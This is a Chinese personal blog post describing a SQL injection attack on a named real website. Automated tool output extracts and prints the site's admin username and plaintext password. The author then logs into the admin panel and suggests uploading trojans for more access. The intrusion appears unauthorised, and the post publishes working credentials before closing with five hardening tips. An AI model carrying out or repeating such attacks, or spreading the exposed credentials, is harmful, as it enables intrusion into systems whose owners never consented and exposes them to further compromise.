Focus on WEB Application and Software Engineering
四月 07
这几天为了毕业设计要做的学生处系统安全的问题在学习SQL注入
实际演练了一下(只为测试,请勿模仿或者用文中方法攻击破坏!)

第一,找目标,比如:
http://www.yldn.com/happy/

http://skyhe.com/down/pic/SQL_yldn1.jpg

首先,用ASC进行站点分析:

http://skyhe.com/down/pic/SQL_yldn6.jpg
获得可注入的链接
http://www.yldn.com/happy/sort.asp?classid=1

然后使用SQL注入工具进行注入、猜测、破解

http://skyhe.com/down/pic/SQL_yldn5.jpg
这里是破解过程和结果:
********************************************************
存在漏洞,以数值型方式注入开始!
可能存在   http://www.yldn.com/happy/admin
可能存在   http://www.yldn.com/happy/admin/index.asp
可能存在   http://www.yldn.com/happy/admin/manage.asp
可能存在   http://www.yldn.com/happy/../admin.asp
存在表   admin
存在账号字段   username
存在密码字段   password
用户名长度为   6位
密码长度为     8位
账号第1位是   z
账号第2位是   h
账号第3位是   p
账号第4位是   a
账号第5位是   y
账号第6位是   y
管理员名为   zhpayy
密码第1位是   6
密码第2位是   6
密码第3位是   3
密码第4位是   7
密码第5位是   1
密码第6位是   1
密码第7位是   4
密码第8位是   8
管理员密码为:66371148
所有检查完毕,请勿非法利用此结果信息!
*******************************************************

用http://www.yldn.com/happy/admin/index.asp登陆管理员入口:

http://skyhe.com/down/pic/SQL_yldn2.jpg
哦哦!进来了!~~~
嘿嘿,如果想拿到更大的权限可以上传些木马!
我在这里就不多说了!

http://skyhe.com/down/pic/SQL_yldn3.jpg

http://skyhe.com/down/pic/SQL_yldn4.jpg

kittow总结:
经过这次破解实战,我认识到网站安全要做到以下几点:
1、替换所有的返回参数、不论数值还是字符,杜绝SQL注入漏洞
2、管理员表一定不能用常见的admin之类
3、管理员密码一定要MD5加密,防止破解
4、数据库进行防下载处理
5、服务器端安全设置要充分,防止ASP木马等脚本木马的上传运行

又UP UP UP~~~!!!^0^

当前评分 2.6 , 共有 7 人参与

  • Currently 2.571429/5 Stars.
  • 1
  • 2
  • 3
  • 4
  • 5

添加评论




看不清?点击图片看看
biuquote
Loading



关于我

kittow (天笑)
80年代生于“天府之国”四川
爱好:编程、篮球、数码、旅游
乘一叶兴趣小舟,漂泊于浩瀚IT海洋。。。
TITLE:MSE of UESTC & 软件设计师
Technical Capacity | Last Blog